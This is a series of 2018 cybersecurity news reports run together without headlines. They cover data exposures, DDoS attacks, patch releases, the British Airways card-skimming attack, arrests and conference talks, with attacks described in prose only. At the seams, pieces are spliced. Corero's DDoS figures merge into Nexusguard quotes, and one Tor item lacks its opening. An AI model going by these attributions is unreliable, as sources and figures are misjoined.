Data management firm Veeam has been left red-faced after a misconfigured MongoDB server was allowed to publicly expose 445 million records, including prospective customer names and email addresses.
Independent researcher Bob Diachenko claimed to have discovered the Amazon-hosted IP address, which was indexed on August 31, on September 5. Found via a simple Shodan search, it was left exposed without a password until September 9.
The 200GB trove appears to have been used by the company’s marketing automation team and included hundreds of millions of records collected from 2013 to 2017.
Publicly exposed data included customers’ first and last names, email addresses and recipient type (end-customer or partner), country, organization size and more, according to Diachenko.
“Even taking into account the non-sensitivity of data, the public availability of such large, structured and targeted dataset online could become a real treasure chest for spammers and phishers. It is also a big luck that database was not hit by a new wave of ransomware attacks which have been specifically targeting MongoDBs (with much more extortion amount demand than it was last year),” he commented.
“As I have already reported, issues with MongoDB have been known since at least March of 2013 and have been widely reported since. The company has updated its software with secure defaults and has released security guidelines. It's been five years now and these unsecured databases are still widely available on the internet.”
The news will be rather embarrassing for a firm which sells back-up and “intelligent data management” solutions to help firms “move securely across multi-cloud infrastructures.”
However, it seems to have acted pretty quickly to secure the server once notified by reporters.
A statement from the company claimed that the records were “non-sensitive” prospect emails, although that would still theoretically be enough to launch phishing attacks at the individuals.
“We have now ensured that all Veeam databases are secure,” it added. “Veeam takes data privacy and security very seriously, and a full investigation is currently underway."
The website of Edinburgh University was still down at the time of writing after the institution suffered a major cyber-attack during its Freshers' Week.
A university spokesman told the Edinburgh Evening News that it has “rigid measures in place” to protect IT systems and data.
“Our defenses reacted quickly and no data has been compromised,” he added. “We will continue to work with our internet service provider, [national cybercrime investigators] and with other universities to prevent these network attacks in future.”
The main ed.ac.uk site was still down on Thursday morning, nearly 24 hours after the first reports of an attack went online. That would indicate a serious DDoS attack.
Jisc, the UK non-profit which runs the super-fast Janet network for research and educational institutions, released a statement claiming that a "number of universities" have been targeted this week and adding that the number of DDoS attacks on them "typically increases at this time of year, when students are enrolling at, or returning to university."
"While Jisc is responsible for protecting connections to the Janet Network for its members (colleges, universities and research centres), members are responsible for protecting their own cyberspace," it added. "However, Jisc also provides DDoS threat intelligence to its community and provides advice to members affected by cyber-attacks on how to deal with the problem and minimize the impact."
Ironically, Edinburgh University was praised by the government this year for carrying out cutting-edge cybersecurity research. It is one of 14 Academic Centres of Excellence in Cyber Security Research, backed by the £1.9bn National Cyber Security Strategy.
DDoS attacks grew by 40% year-on-year in the first six months of 2018, according to new figures from Corero Networks.
The security firm claimed that attacks are becoming shorter — with 82% lasting less than 10 minutes — and smaller, with 94% under 5Gbps. However, one in five victims are hit with another attack within 24 hours, the report revealed.
The research looked at the same period last year and found that the maximum attack size quadrupled to 359Gbps. Evaluating thousands of worldwide DDoS attacks, researchers reportedly gathered real-time attack data from botnet scanning, honeypots, ISPs and traffic moving between attackers and their targets. Data analysis led researchers to attribute the stark surge to IoT botnets and Satori malware exploits, one of many variants of the Mirai malware.
“Due to the increase in IoT-related malware exploits and the rampant growth of large-scale DDoS attacks, research conclusions point to the continued use of IoT botnets. Cyber-attacks hit the 2018 FIFA World Cup, as well as cryptocurrency-related businesses, maximizing revenue loss,” Nexusguard wrote in a press release. Additionally, attacks on the Verge Network (XVG) resulted in a significant loss of 35 million XVG tokens.
“The biggest zero-day risks can stem from various types of home routers, which attackers can exploit to create expansive DDoS attacks against networks and mission-critical services, resulting in jumbo-sized attacks intended to cripple targets during peak revenue-generating hours,” said Juniman Kasman, chief technology officer for Nexusguard.
“Telcos and other communications service providers will need to take extra precautions to guard bandwidth against these super-sized attacks to ensure customer service and operations continue uninterrupted.”
Nexusguard analysts advise communications service providers (CSPs) and other potentially vulnerable operations to augment their preparedness so that they are able to maintain their bandwidth, especially if they lack full redundancy and failover plans in their infrastructures. CSPs and vulnerable organizations that enhance bandwidth protection will be better positioned to stay ahead of the surging attack sizes.
“In the quarter, increasingly large attacks (a YoY average-size increase of 543.17%) had a severe impact on Communication Service Providers (CSP)," the report said. "Serving as a link between attack sources and victim servers and infrastructures, CSPs bear the burden of the increasing size of traffic, irrespective of its source or destination. As such, Internet service is degraded.”
Whether it’s hiring new staff or up-leveling internal staff, companies have had to get creative in order to deal with the real challenges of the skills gap. In talking about what security leaders are doing to focus on people and training them, Steve Moore, chief security strategist at Exabeam, talked with industry experts at Spotlight18 in Las Vegas to understand the creative ways that they have answered talent shortage.
One solution is, "Red team/blue team exercise and testing internally to make sure we are keeping staff on their toes,” said Ray Johnston, CISO at Inspire Brands. While internal efforts to keep current team members abreast of the newest threats are fruitful, it’s also important to build relationships outside of the organization.
“We have established relationships with Army cyber defense and National Guard cyber defense units, and we’ve been able to pull from that resource pool,” Johnston said. Companies can tap into a wide pool of candidates that includes highly skilled people coming off of active duty.
“Also, we have been establishing relationships with local universities,” Johnston said. Partnering not only with local universities but existing partners can also open doors of opportunity. Many existing partners are also confronting staffing issues, so potential success can depend a lot on partners, which is why part of the solution is growing people from inside with mentors and interns. Then there are organizations such as CyberPatriot that enable experts to mentor younger students and introduce them to the career opportunities available in cybersecurity.
Training is one area where many organizations fall behind, and Moore emphasized the importance of making sure the people in the SOC even know what they are protecting in terms of the business they are dealing with, the key risks and where the jewels are.
Given that IT as a whole and security in particular are challenged with constrained staffing and budgetary resources, “The single best advice, is to make sure that your strategy for the SOC is aligned with risk,” said Andrew Wild, CISO at QTS. “Look at the limited resources you have, and make sure those align with the risks you think your organization is facing so that you can explain how they have been appropriately allocated.”
Another creative measure companies can take is to invest in new technologies that allow for security capabilities to be put into the hands of less-skilled people across the organization. “We have human resources departments that have started using Exabeam themselves. Even though they have never used a security technology, they can monitor user activity. This is really useful, especially if they know they are soon going to go through a reduction in force,” said Tony Kolish, EVP customer success at Exabeam.
“Monitoring user behavior then flags any anomalies so that other departments – such as HR and legal – can detect if something odd is happening. Then they can push that forward to the security team as something worth investigating.”
Having had the experience of building a SOC in the middle of a crisis in his former post, Steve Moore, chief security strategist at Exabeam, understands the need for security and security operations to be relevant. Leading a panel discussion on "Building a Modern SOC" at this year’s Spotlight18 conference in Las Vegas, Moore questioned why – given that so many organizations now have a SOC – attackers continue to be successful.
In order to answer that question, panelists first discussed what indicators of success or failure they look for in a SOC.
Panel participant Andrew Wild, CISO at QTS, went straight to metrics. “One key for me is looking at whether you have the right people and asking whether the metrics are good. Are the metrics reliable enough to evaluate your ongoing performance?” Looking at how they are measuring and how they can improve are indicators that offer value when thinking about SOC transformation.
While metrics do have value, Ray Johnston, CISO at Inspire Brands, said one key indicator for him is looking at whether they have the right people. “How are you keeping them current? Do they have the right skill sets? We underinvest in people, and let them sit and stagnate. At the end of the day, it’s people, process and technology. People can screw up that process.
“Most often, conversations about the SOC include the issue of signal-to-noise ratio. SOCs lack contextualization, the time they need to build the story and the right resources to make decisions in a rapid fashion. We have to get better at moving the advanced threat actors into spaces where we can pick them up quicker.”
In addition to the people, there are also technical blockers, like patching, which is always an issue. Viewed by some as the easiest thing to do, panelists agree that many people do patching quite poorly, with few people understanding whether patching is even managed and maintained right or if the patches are even working properly.
“Patching is important, but what are you patching?” said Wild. “You can’t patch everything. It’s just not possible. Are they patching those software components with known exploits that are commonly used? We need to be bringing a risk-based approach into the SOC to focus on the known threats that are most likely to cause issues.”
A risk-based approach includes physical security but also knowing what and where the crown jewels are. “It’s not just in the security space but in the space around security. If you are not aware of where the consumer or business trends are taking the business, you will fail,” Wild said.
In his keynote address, “Transforming Security Operations with Modern Security Analytics” at this year’s Spotlight18 conference in Las Vegas, Don Sheehan, director of cyber defense solutions at Grant Thornton, said the security operations center (SOC) is challenged by the new reality that data is everywhere.
While there has been an increase in awareness of the potential impacts of cyber issues, and executives are more aware, Sheehan said that when it comes to the potential risks and downstream implications, awareness is still lacking.
Organizations continue to confront concerns about cybersecurity spending, asking whether they are spending too much because they don’t have any incidents or whether they are not spending enough, leaving themselves unprepared for incidents.
Security operation centers are also being challenged by the integration of risk as part of business risk discussions and the constant fear of the next threat, which has shifted the focus to not only security but resilience for the organization.
Recognizing that security is not an island, it’s imperative to build security into the entire organization, particularly when thinking about insider threat programs. “Threat actor TTPs drive us to identify a security threat via a much larger and diverse set of system data, rather than collection and correlation of security alerts,” Sheehan said.
Despite the security measures that have been taken, most organizations are left thinking that they are not yet safe enough. “Everybody wants to protect things, until the budget comes out,” Sheehan said. Still, the cyber landscape is evolving to include a shift in focus on insider threats.
“The SOC is not just security anymore, nor is it just operations and it may not even be a center. Coordination with non-IT teams is now normal. Risk management, HR, legal, physical security, IT operations. Use cases from these nontraditional teams are changing the focus and increasing the workload for the cyber defense center team.”
The change in direction isn’t problematic, but as workloads increase, the team gets stuck doing the old stuff plus the new focus areas. “Automation of common tasks can free up time for staff to focus on more complex challenges, and integrating with other business areas makes cyber more relevant and not just ‘techie,’ which means the SOC is moving beyond reactive mode.”
As SOCs evolve, though, insider threat programs need to be more than just a tool. “An insider threat program requires new event data to be analyzed, but the correlation of physical security logs with security telemetry has many challenges. This increases the coordination responsibilities and requires updated workflows.”
The Ministry of Defence (MoD) does not fully understand the causes or impact of skills gaps in critical areas like cybersecurity and has no clear vision on how to reduce these gaps in the future, a damning Commons report has concluded.
The Public Accounts Committee’s Skills shortages in the Armed Forces report revealed that last year the MoD had 102 “trades” where there were insufficient numbers of skilled personnel available. This included a 26% shortfall in intelligence analysts.
What’s more, the number of forces regulars describing morale as “low” has increased from a third in 2010 to 67%.
“The Department has not developed a coherent plan to close the shortfalls and respond to new requirements, or undertaken a strategic analysis of its ability to attract and keep the skilled personnel it needs,” the report claimed.
“A challenging external environment, including national skill shortages in areas such as engineering, means that the Department faces strong competition from other government bodies and the private sector to recruit specialist skills. There could also be an impact on the Armed Forces should Brexit further increase demand for scarce skills in the UK.”
The PAC said the MoD is currently developing “a new long-term career structure” for those in cyber-related positions, which involves “reviewing the entry requirements and considering whether these posts need to be military roles.”
However, it has still not thought radically enough about how to recruit people with specialist skills, and should think about using financial incentives, flexing entry requirements and re-designating roles as well as overcoming procedural barriers to accelerate the process, it claimed.
The committee also urged the MoD to modernize its recruitment process, having failed to meet targets for the past three years.
“The Department should ensure that its skills strategy sets out a credible approach to increasing interest in a career in the Armed Forces from among a broader base of society,” it said. “This should also include a communications plan—based on research—to generate interest from more diverse groups in society and from among those who have previously served in the Armed Forces.”
In January, the head of the British army called for more cash to help counter the cyber-threat from Russia.
Meanwhile, a new tech non-profit launched earlier this year to encourage Armed Forces vets to take up positions in the IT industry, to help reduce skills shortages in the private sector.
Mobile fraud rates jumped by nearly a quarter (24%) from 1H 2017 to the first half of this year, with a 150 million recorded attack attempts, according to ThreatMetrix.
The firm analyzed 17.6 billion online transactions during the first half of 2018 via its Digital Identity Network, finding that over half (58%) now come via the mobile channel.
This is also reflected in the growing prevalence of fraud — especially in the US, where mobile attacks jumped 44% over the same period.
Mobile fraud now represents one third of all attacks stopped by ThreatMetrix, but the channel still represents a more secure way to transact than via desktop, it claimed.
This is apparently because devices offer more ways to determine a user’s digital identity, including geolocation, device attributes and behavioral analysis.
“Mobile is quickly becoming the predominant way people access online goods and services, and as a result organizations need to anticipate that the barrage of mobile attacks will only increase,” said Alisdair Faulkner, chief identity officer at ThreatMetrix. “The key point of vulnerability is at the app registration and account creation stage. To verify users at this crucial point, organizations need to tap into global intelligence that assesses true digital identity, compiled from the multiple channels that their customers transact on.”
Bot attacks continue to fuel the growth in global fraud, with an “unprecedented” 60% increase in the second quarter of the year: from one billion bot attacks in Q1 to 1.6 billion in Q2.
ThreatMetrix claimed that this automated traffic can account for more than half of all transactions at peak times, as fraudsters try to crack user accounts. Without the right tools in place to spot this traffic, organizations can find order processing slows, the firm warned.
During the second quarter of 2018, ThreatMetrix claimed to have analyzed 8.3 billion transactions, stopping 151 million attacks in real time. Its latest Q2 2018 Cybercrime Report is out now.
Microsoft released fixes for over 60 CVEs yesterday as part of its monthly update round, three of which have been publicly disclosed and one which was being actively exploited in the wild.
CVE-2018-8440 is an Elevation of Privilege vulnerability in Windows Advanced Local Procedure Call (ALPC) which was disclosed by researcher and Twitter user @SandboxEscaper on August 27.
“It didn't take long for malicious actors to incorporate this into real-world attacks, with users having no recourse until today's patches came out,” explained rapid7 senior security researcher, Greg Wiseman. “Although an attacker would need to convince a user to download and open a specially crafted file to exploit this, if successful, they would be able to gain full system privileges.”
The remaining three publicly disclosed vulnerabilities are not currently being exploited in the wild but admins are encouraged to patch them.
"CVE-2018-8409 is a Denial of Service (DoS) vulnerability in System.IO.Pipelines which could allow an attacker to cause a DoS against an application that is leveraging System.IO.Pipelines. This vulnerability can be exploited remotely, without authentication,” explained Ivanti director of product management, Chris Goettl. “The challenge with this update is that you need to take the new versions of .NET Core 2.1 or ASP.NET Core 2.1 and implement the updated binaries into your application. It is not a simple patch that can be applied.”
CVE-2018-8475 is notable in being an RCE bug in Windows that could be “a very tempting vector for social engineering attacks,” according to Wiseman.
Finally, there’s CVE-2018-8457, a Memory Corruption vulnerability in Microsoft’s Scripting Engine.
“An attacker could corrupt memory in such a way that they could execute arbitrary code in the context of the current user. The attacker would gain equal rights to the user context they exploit. Least privilege will mitigate the impact if this vulnerability is successfully exploited,” explained Goettl.
“There are multiple user-targeted attack vectors that could be used to exploit this vulnerability, including web-based attack scenarios where specially created websites could host malicious content, as an embed in an ActiveX control marked ‘safe for initialization’ within an application or Office document.”
A Twitter user who goes by the handle @x0rz tweeted that the vulnerability is very easy to reproduce.
“More concerning than a single vulnerability against a single browser version, even if Tor, is the wide range of exploits tracked by Zerodium,” said Mukul Kumar, CISO and VP of cyber practice at Cavirin.
“The attack surface is large, and the hackers have multiple entry points. To maintain one’s cyber posture requires diligence and a multi-layer approach to security that includes OS and application hardening, patching, and user training, not to mention firewalling, encryption.”
Zerodium is an acquisition platform for zero-day vulnerabilities. The company buys vulnerabilities and then resells the information to the federal government, said Chris Morales, head of security analytics at Vectra. “This announcement is being made months after the flaw was first discovered and provided to government agencies. The flaw is patched in the latest version of Tor, so the announcement was intended as more informational as the solution is to simply update to Tor Browser 8.0.”
However, NoScript author Giorgio Maone tweeted, “It's a bug caused by a work-around for NoScript blocking the in-browser JSON viewer. Thanks @campuscodi for notifying me of the zero day announcement, nobody else did :( A fix is on its way, matter of hours or less. Stay tuned!”
According to Morales, the big question here is whether the vulnerability was used by government agencies to access systems they believed were being used by targeted individuals.
"Tor does not serve a legitimate business function and is commonly blocked in major enterprises as a risk. We see Tor used by attackers as a form of bypassing perimeter security controls to establish remote access and for command and control. Tor is also used to anonymize activity on the web that a person would not want to be monitored by an ISP or government entity. This vulnerability would have allowed for someone to do exactly that – monitor someone who did not want to be seen.”
A new survey revealed that a large majority of US businesses experienced at least one unplanned IT disruption over the last 12 months, according to US Signal. Their 2018 IT Resiliency Survey found that 70% of businesses had a minimum of one outage, while 66% said that they believe their organization is at risk of IT disruption. Of those, 10% said they feel very vulnerable to potential interruptions. No respondents reported that they feel fully resistant to an IT disruption.
When expanding out to three years, the number of organizations that reported unexpected IT disruptions jumped to 80%. Of the disruptions companies experienced, 53% were outages from natural disaster. Additionally, 26% were from errors that occurred while implementing new technology. Only 21% were the result of ransomware or IT overloads.
While 58% of businesses affirmed that they have a disaster recovery plan in place, the report revealed that survey participants believe their plans could be improved. One in five respondents were unable to attest to the frequency of updating their disaster recovery strategy, but only 8% of respondents have no plan to speak of.
“These findings imply that many businesses have not yet come to grips with planning, implementing or reviewing disaster recovery strategies and that some could benefit from third-party support in either developing, managing or maintaining their disaster recovery plan,” the press release said.
In order for companies to be compliant with the General Data Protection Regulation (GDPR), they need to have a disaster recovery plan, which many survey participants expressed concern over, and almost a quarter of US businesses lack confidence in the strength of their current plan.
“The results of US Signal’s 2018 IT Resiliency Survey should sound a wake-up call to businesses across the country. Disaster recovery strategies have to be planned, tested, implemented, modified and updated on a regular basis, and it’s clear that this is not happening in many instances,” said US Signal president Stephen Oyer.
“Companies need to recruit the right IT talent either in-house or through external consultants and invest in the best IT solutions to stay ahead of the game – whether that’s planning for natural disasters or fighting off the latest malware or virus. If they fail to do so, businesses risk being hit by the high costs associated with unplanned IT downtime.”
The month of August saw a surge in the Ramnit banking trojan, which doubled its global impact and number of attacks in the past couple of months, jumping to sixth place in the Global Threat Index, and fifth place in the UK, according to a new report from Check Point.
In addition to Ramnit climbing in the ranks, Lokibot, an Android banking trojan and information stealer, advanced to the most popular malware on Check Point’s list of Most Wanted Mobile Malware. Lokibot was most frequently used to attack the mobile estates of global organizations, but Lotoor and Triada took the second- and third-place spots for most wanted mobile malware.
The August 2018 findings mark the second summer running in which financially motivated hackers have increased their use of banking trojans to target victims.
“Trends like this should not be ignored as hackers are acutely aware of which attack vectors are most likely to be successful at any given time, suggesting internet users’ browsing habits during the summer months makes them more susceptible to attack than at other times of the year,” researchers wrote in today’s blog post.
The trend emphasizes the level of sophistication and tenacity that malicious actors have when it comes to extorting money. To that end, crypto-mining remained the most common malware during August, with Coinhive still holding strong in the top position, which it has held since March 2018.
The Coinhive malware impacted 17% of global organizations, whereas the second and third ranked cryptomining malwares, Dorkbot and Andromeda respectively, each had a global impact of 6%.
Researchers also analyzed the vulnerabilities that were most exploited during the month of August and found that CVE-2017-7269 was the top choice for hackers, with a 47% global impact. “By sending a crafted request over a network to Microsoft Windows Server 2003 R2 through Microsoft Internet Information Services 6.0, a remote attacker could execute arbitrary code or cause denial of service conditions on the target server. That is mainly due to a buffer overflow vulnerability resulted by improper validation of a long header in HTTP request,” researchers wrote.
Trend Micro has moved quickly to counter privacy and security concerns over the browser data collection features of some of its Mac apps.
Dr. Antivirus, Dr. Cleaner and Dr. Unarchiver were top-selling and rated apps on the Mac App Store before Apple apparently removed them following reports of unusual behavior.
Some reports suggested they were akin to the Adware Doctor app which was removed last week after researchers claimed it gathered and sent data on browser history, running processes and software downloads to China.
However, the security giant hit back yesterday, stating: “Reports that Trend Micro is ‘stealing user data' and sending them to an unidentified server in China are absolutely false.”
The firm claimed that the three apps — as well as Dr Cleaner Pro, Dr. Battery, and Duplicate Finder — collected and uploaded a “small snapshot of the browser history on a one-time basis, covering the 24-hours prior to installation.”
“This was a one-time data collection, done for security purposes (to analyze whether a user had recently encountered adware or other threats, and thus to improve the product & service). The potential collection and use of browser history data was explicitly disclosed in the applicable EULAs and data collection disclosures accepted by users for each product at installation,” the firm continued.
“The browser history data was uploaded to a US-based server hosted by AWS and managed/controlled by Trend Micro.”
However, Trend Micro said it has also now completely removed the browser data collection feature across these consumer products and erased any related legacy logs stored on those AWS server, in order to allay any lingering customer concerns.
The firm added that it has identified a “core issue” which was down to the use of common code libraries.
“We have learned that browser collection functionality was designed in common across a few of our applications and then deployed the same way for both security-oriented as well as the non-security oriented apps such as the ones in discussion,” it said. “This has been corrected.”
A Russian national has been extradited to the US where he faces charges related to a notorious series of raids against JP Morgan and other companies said to have affected over 100 million customers.
Andrei Tyurin, 35, was arrested in Georgia after a request by the US government.
Alongside alleged co-conspirators Gery Shalon, Joshua Samuel Aaron and Ziv Orenstein, he is said to have participated in a widespread hacking campaign, including what is said to be the largest ever theft of US customer data from a financial institution.
Around 83 million customers were affected by the JP Morgan breach in 2014, although other firms including E*Trade Financial Corp, Scottrade and Dow Jones & Co were also hit.
The accused are alleged to have obtained customer data to further criminal schemes such as a pump-and-dump campaign which saw them make millions off the back of selling penny stocks to the breached customers – artificially inflating their price.
Tyurin is charged with an “extensive” hacking campaign targeting a range of companies from 2012 to mid-2015, stealing personal information from over 100m individuals.
“In addition to the US financial sector hacks, Tyurin also conducted cyber-attacks against numerous US and foreign companies in furtherance of various criminal enterprises operated by Shalon and his co-conspirators, including unlawful internet gambling businesses and international payment processors,” the DoJ claimed.
“Nearly all of these illegal businesses, like the securities market manipulation schemes, exploited the fruits of Tyurin’s computer hacking campaigns. Through these various criminal schemes, Tyurin, Shalon, and their co-conspirators obtained hundreds of millions of dollars in illicit proceeds.”
The Moscow man is charged with conspiracy to commit computer hacking, wire fraud, computer hacking, conspiracy to commit securities fraud, bank fraud, aggravated identity theft and conspiracy to violate the Unlawful Internet Gambling Enforcement Act — which carry maximum terms ranging from five to 30 years.
The British Airways breach was the result of a highly targeted digital skimming attack by the same cybercrime group that compromised Ticketmaster and hundreds of other global e-commerce firms over the past year, according to experts.
RiskIQ has been following the notorious Magecart group since 2015 and recently alerted the industry about an evolution in its tactics, to focus on introducing malicious “skimming” code designed to exfiltrate users’ card details as they are typed into a site.
Although many of these attacks against some of the world’s biggest e-commerce brands were carried out by infecting a third-party software provider, the BA attack was targeted at the carrier itself rather than its supply chain, claimed Risk IQ in a new blog post today.
Threat researcher, Yonathan Klijnsma, explained that his team began by scanning BA web scripts over time to identify if any of them changed.
The script was apparently designed to extract info from the payment form as soon as soon as it was entered and send to the attacker’s server.
The timestamp for this modified script was August 21 at 20.49 local time, just hours before the attack began, although RiskIQ believes the attackers may have had access to the BA site far earlier, as the certificate they used for attack infrastructure was registered on August 15.
This was a highly targeted attack with the skimmer “attuned to how British Airway’s payment page is set up,” and maximum care was taken to avoid suspicion, Klijnsma explained.
“The infrastructure used in this attack was set up only with British Airways in mind and purposely targeted scripts that would blend in with normal payment processing to avoid detection. We saw proof of this on the domain name baways.com as well as the drop server path,” he said.
“The domain was hosted on 22.214.171.124 which is located in Romania and is, in fact, part of a VPS provider named Time4VPS based in Lithuania. The actors also loaded the server with an SSL certificate. Interestingly, they decided to go with a paid certificate from Comodo instead of a free LetsEncrypt certificate, likely to make it appear like a legitimate server.”
“While the Magecart attack against British Airways wasn’t a compromise of a third-party supplier like the attack on Ticketmaster, it does raise the question of payment form security,” concluded Klijnsma.
“Companies, especially those that collect sensitive financial data, must realize that they should consider the security of their forms — but also the controls that influence what happens to payment information once a customer submits it.”
Around 380,000 transactions are said to have been affected by the 16-day raid on the BA web site and app.
Efforts to investigate the extent to which Russian’s meddled in the 2016 presidential election – what President Trump has deemed a rigged witch hunt – continue. The latest interviews in Robert Mueller’s probe into Russian collusion involve two associates of GOP operative Roger Stone.
Comedian and talk-show host, Randy Credico, and political commentator, Jerome Corsi, were questioned last week, according to the The Hill. Credico’s lawyer, Martin Stolar, said that his client was asked about his relationship with both Stone and WikiLeaks in front of a grand jury Friday, Reuters reported. Credico’s testimony suggested that prosecutors are looking to understand the extent of Stone’s relationship with WikiLeaks.
On Thursday, the known conspiracy theorist, Jerome Corsi, was also questioned. CNN reported that Corsi was originally set to testify Friday but the plan was placed on hold. As the investigation seems to be moving toward Stone being indicted, Stone told CNN that he would fully cooperate with investigators, but there is no situation under which he would testify against President Trump.
After WikiLeaks released emails that had been obtained during the hack of Democratic National Party’s in the 2016 presidential election, Stone became a person of greater interest. Mueller’s team has reportedly been inquiring about Stone’s relationship with WikiLeaks founder, Julian Assange, Reuters reported. According to US intelligence agencies, the hack of the DNC’s email server was the act of Russian operatives who then used WikiLeaks to publish the information.
“The special counsel is investigating if Stone had any advance knowledge of the 2016 document dump after Stone sent out multiple tweets lining up with the reveal of the Democratic documents,” The Hill wrote.
The interviews have caused stress for Credico, who arrived in Washington with his therapy dog, Reuters reported. The Senate Intelligence Committee has also reportedly asked Credico to provide “certain documents,” which his lawyer told Reuters would not likely happen voluntarily.
Australian banks have made headlines once again with reports that a former employee shared customer information with a mortgage broker. According to news from the Australian Broadcasting Company (ABC), a manager at Westpac bank shared customers’ banking passwords with a mortgage broker, making this serious breach of customer privacy one of 32 breaches among Australia’s four largest banks.
The revelation is one of many security incidents at Westpac. In evidence obtained by 7.30 under Freedom of Information laws, incidents involving the improper handling of information at Westpac extend as far back as 2012 and are as recent as April 2018.
Australian news program 7.30 said that the former Westpac employee Marten Pudun was responsible for sharing the banking passwords of 80 customers to a mortgage broker.
The Australian Securities and Investments Commission (ASIC) effectively banned Pudun in July 2018, preventing him from from engaging in credit activities after knowingly or falsely giving fraudulent documents to Westpac in an attempt to benefit his clients, ABC reported.
A Westpac spokeswoman told ABC the bank takes the protection of its data and privacy extremely seriously. "We engage regularly with the OAIC and proactively report certain suspected data breaches," she said.
"When we make mistakes, we make sure we put it right by remediating affected customers, informing all relevant authorities, making process changes to prevent similar incidents, and where necessary, taking disciplinary action against employees who are found to have done the wrong thing in accordance with our Westpac Group Code of Conduct."
In an effort to help individuals who have been the victim of cybercrimes, Saga, an insurance provider, today announced it will now include Personal Cybercrime coverage in its insurance policies. The coverage will protect individuals against risks from their personal devices.
According to Saga, the proposition to launch personal cybercrime insurance to the market is the first of its kind. In a recent study conducted by Saga, the company found that 72% of its 11,300 customers over the age of 50 feel at risk of either a cyber-scam or online fraud. In response to that growing concern, the company will also offer help and advice to protect people falling victim to cyber-criminals.
The research also found that 75% of Saga members use the web for both online shopping and banking despite the concerns about online threats. Users continue to book vacations, reserve hotel rooms and share personal information via social media platforms.
“As the majority of our personal transactions are now conducted online, [we] need to ensure we are protected from a personal perspective, in the event of becoming a victim of a cyber-attack,” said Simon Mcphee, head of Saga Home Insurance. “Many of our Saga members have embraced digital apps and platforms and have integrated these into their day to day lives. However, as technology continues to evolve, so do the methods used for online fraud and cyber scams.”
While many insurers offer plans that cover cyber risks in the commercial sector, none to date have extended that coverage to individuals, according to Saga. As part of the legal cover add-on, the plan will restore electronic devices to their previous states, where possible. In addition, the coverage offers reimbursement for subscriptions to credit-monitoring companies following a cyber-attack and includes an advice line where customers can talk about their cybersecurity concerns.
“We are excited to be able to offer our customers a unique product, which has been developed to help with issues they have told us they have real concerns about. In addition to assisting our customers in the event of becoming a victim of a cyber-attack, there is also an advice line to discuss cyber-attack matters that may be of concern.”
Speaking in the guest keynote at the Gartner security summit in London, security researcher and self-declared hacker Keren Elazari said that the security landscape has evolved to a point where hackers are needed, as cyber-criminals seek new ways to earn money.
She highlighted the emergence of cryptomining efforts and software, particularly in the cases of Starbucks and Tesla, and said that while ransomware was last year’s trend, it was “not time to say goodbye.”
As well as her role model, Angelina Jolie’s character from the 1995 film Hackers, she praised Marcus Hutchins as the “savior of WannaCry”, Barnaby Jack and those who built tools including Shodan, Metasploit and haveibeenpwned.
She said: “I grew up as a hacker and didn’t think I was doing anything wrong, and didn’t imagine myself as a hoodie-wearing hacker, I was a creative and curious child and was always asking questions until 1993 when the internet came to Israel.”
Elazari said that “a world of hackers” need to be enlisted, as the “world is more complicated than before and we cannot do what we did in the past” and that is why an immune system is needed.
She said that this includes deploying bug bounty programs and tapping into hacker conferences like DEFCON, where she said she “sees 30,000 talented individuals.”
Concluding with predictions, she said that cyber-criminals are continuing to evolve “and go big and upstream” using evasive attacks with legitimate tools which exist in the infrastructure. This means that better strategies to deal with attacks and response should be created.
She also said that decisions need to be made on who stands on the front lines, as every day users and individuals “make hundreds of security decisions every day,” and while many are assisted and helped by brilliant security officers, they need the tools to make better decisions.
“Some are based on machine learning and algorithms, and help defend organizations better,” she said. “The future will be defined by conflicts between humans and machines, but how do you enlist help as humans will always outsmart machines - bring the hacker mindset into your organization and you can start today.”
With security professionals overwhelmed, they need to be able to achieve successful results by asking three key questions: what’s important, what’s real and what’s dangerous.
Delivering the opening keynote at the Gartner Security Summit, research directors Patrick Hevesi and Steve Riley, and principal research analyst Sam Olyaei, said that security is “no longer the same” as components have turned cybersecurity into a “viable public opinion issue.”
Riley argued that professionals are “overwhelmed” by a shortage of risk management expertise, as it often “takes a backseat” to what needs to be done first and disputes over priorities, “and we want to empower you with resources for the greatest impact to empower you to adapt processes, people and technologies,” to be empowered to prioritize, adapt, transform and scale.
Riley said: “The key to empowerment is finding and shaping outcomes, and empowering the users and organizations who depend on you.”
Looking at the three questions, Olyaei encouraged the audience to factor them “for better collaboration, and to consider the customer impact of security controls.”
He added: “Effective communications make risk management real, and Gartner research shows a cultural disconnect between security and the rest of the business. It becomes too easy for significant miscommunication to happen.
“Understand and learn how business departments work, and build message plans tailored to these audiences, so it can align to their goals.”
The analysts gave further examples of “urgent crisis for threat” in the Spectre/Meltdown bugs from January, and “technology transformation” in use of the cloud and hosted email services.
Speaking on cloud, Hevesi said that moving to the cloud requires controls “which are appropriate for the environment you are protecting and any transformation you undergo,” and he said any controls should be adaptive to the technology “as the compliance landscapes evolve.”
Riley concluded by saying that applying the three questions can help you move from overwhelmed to successful, while Hevesi said that each scenario “shows a level of clarity and inspires an action,” and the analysts encouraged the audience to apply the risk strategy to future scenarios and the three questions.
“They are equally powerful whether you are facing an individual, organizational or global scenario,” Hevesi said.